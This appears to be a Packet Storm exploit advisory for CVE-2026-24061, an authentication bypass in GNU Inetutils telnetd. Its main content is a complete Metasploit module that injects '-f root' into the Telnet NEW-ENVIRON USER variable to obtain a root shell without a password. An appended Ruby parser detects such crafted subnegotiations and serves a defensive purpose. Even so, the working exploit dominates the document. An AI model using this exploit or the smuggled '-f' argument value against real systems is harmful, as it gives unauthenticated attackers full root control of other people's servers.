📄 GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass

🗓️ 03 Mar 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news | 👁 91 Views

Critical pre-auth flaw in inetutils telnetd enables remote root via NEW-ENVIRON bypass (CVE-2026-24061).

=============================================================================================================================================
    | # Title     : GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass Root Access                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.gnu.org/software/inetutils/                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    :  A critical authentication bypass vulnerability has been identified in GNU Inetutils, specifically affecting the telnetd service.
    
    The issue occurs due to improper validation of the NEW-ENVIRON Telnet subnegotiation option. By sending a specially crafted environment variable containing the value -f root within the USER field, a remote attacker can force the service to invoke the system login process in a way that bypasses password authentication.
    
    Successful exploitation allows an unauthenticated remote attacker to gain root-level access over Telnet without providing valid credentials.
    
    The vulnerability is tracked as: CVE-2026-24061
    
    Impact
    
    Remote unauthenticated root access
    No brute force required
    No valid credentials required
    Full system compromise possible
    
    Severity
    
    Critical – Pre-Authentication Remote Code Execution / Privilege Escalation
    
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::Telnet
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'GNU Inetutils telnetd Authentication Bypass (Enhanced)',
          'Description'    => %q{
            This module exploits an authentication bypass vulnerability in GNU Inetutils telnetd.
            By sending a specially crafted NEW-ENVIRON subnegotiation with a USER variable
            containing '-f root', an attacker can login as root without a password.
            This occurs because telnetd passes the environment variable directly to the 
            login command without proper sanitization.
          },
          'Author'         => [ 'indoushka' ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2026-24061' ]
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'Space'    => 2000,
              'BadChars' => "",
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [ [ 'Automatic', { } ] ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Feb 20 2026',
          'Notes'          =>
            {
              'Stability'   => [ CRASH_SAFE ],
              'Reliability' => [ REPEATABLE_SESSION ],
              'SideEffects' => [ IOC_IN_LOGS ]
            }
        ))
    
        register_options(
          [
            Opt::RPORT(23),
            OptString.new('USER', [ true, "The target user to bypass (usually root)", 'root' ])
          ])
      end
    
      def exploit
    
        connect
    
        print_status("Waiting for server banner and negotiation...")
        banner = sock.get_once(-1, 5)
        if banner
          print_status("Target Banner: #{banner.strip}")
        end
        
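        # Telnet NEW-ENVIRON subnegotiation (RFC 1572)
        packet = "\xff\xfa\x27\x00"        # IAC SB NEW-ENVIRON IS
        packet << "\x00USER"               # VAR "USER"
        packet << "\x01-f #{datastore['USER']}" # VALUE; the leading "-f" is the injected login option
        packet << "\xff\xf0"                # IAC SE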
    
        print_status("Sending bypass payload for user: #{datastore['USER']}...")
        sock.put(packet)
    
        Rex.sleep(1)
    
        sock.put("id\n")
        res = sock.get_once(-1, 5)
    
        if res && res =~ /uid=0/
          print_good("Success! Authenticated as root (uid=0).")
    
          handler
        else
          print_error("Failed to bypass authentication. Server might be patched or using PAM sanitization.")
        end
    
      rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
        print_error("Connection failed.")
      ensure
    
      end
    end
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
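
For detection, the same subnegotiation can be parsed out of captured client-to-server Telnet bytes and checked for a USER value that begins with "-". The following is an added example, not part of the original advisory or of GNU Inetutils; the function names and the leading-dash heuristic are assumptions, and the sample byte strings are constructed.

```ruby
IAC, SB, SE, NEW_ENVIRON = 0xff, 0xfa, 0xf0, 0x27
IS, INFO = 0x00, 0x02                       # subnegotiation commands that carry values
VAR, VALUE, ESC, USERVAR = 0x00, 0x01, 0x02, 0x03
HEADER = [IAC, SB, NEW_ENVIRON].pack("C*")

# Return the body of each complete IAC SB NEW-ENVIRON ... IAC SE block, with IAC IAC unescaped.
def new_environ_blocks(stream)
  data, blocks, pos = stream.b, [], 0
  while (i = data.index(HEADER, pos))
    body, i = [], i + 3
    while i < data.bytesize
      break if data.getbyte(i) == IAC && data.getbyte(i + 1) == SE
      i += 1 if data.getbyte(i) == IAC && data.getbyte(i + 1) == IAC
      body << data.getbyte(i)
      i += 1
    end
    blocks << body if i < data.bytesize     # keep only blocks closed by IAC SE
    pos = i + 2
  end
  blocks
end

# Split a block body into [name, value] pairs (RFC 1572 VAR/USERVAR/VALUE with ESC quoting).
def parse_pairs(body)
  return [] unless [IS, INFO].include?(body.first)
  pairs, j = [], 1
  while j < body.length
    if [VAR, USERVAR].include?(body[j])
      pairs << ["".b, nil]                  # new variable, value not seen yet
    elsif body[j] == VALUE && pairs.any?
      pairs.last[1] = "".b
    elsif pairs.any?
      j += 1 if body[j] == ESC && j + 1 < body.length
      (pairs.last[1] || pairs.last[0]) << body[j]
    end
    j += 1
  end
  pairs
end

# Heuristic (assumption): a USER value starting with "-" would be read as an option by login.
def suspicious_user_values(stream)
  pairs = new_environ_blocks(stream).flat_map { |body| parse_pairs(body) }
  pairs.select { |name, value| name == "USER" && value&.start_with?("-") }
end

# Constructed samples: CRAFTED repeats the bytes built in the PoC above, BENIGN is a normal client.
CRAFTED = "\xff\xfb\x18\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0".b
BENIGN  = "\xff\xfa\x27\x00\x00USER\x01alice\x03TERM\x01xterm\xff\xf0".b
```

`suspicious_user_values(CRAFTED)` returns the offending pair, while the benign negotiation yields nothing; the same leading-dash check is what a server-side filter would apply before the value reaches the login command line.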

Vulners AI Score: 6 (Medium risk) | CVSS 3.1: 9.8 | EPSS: 0.91526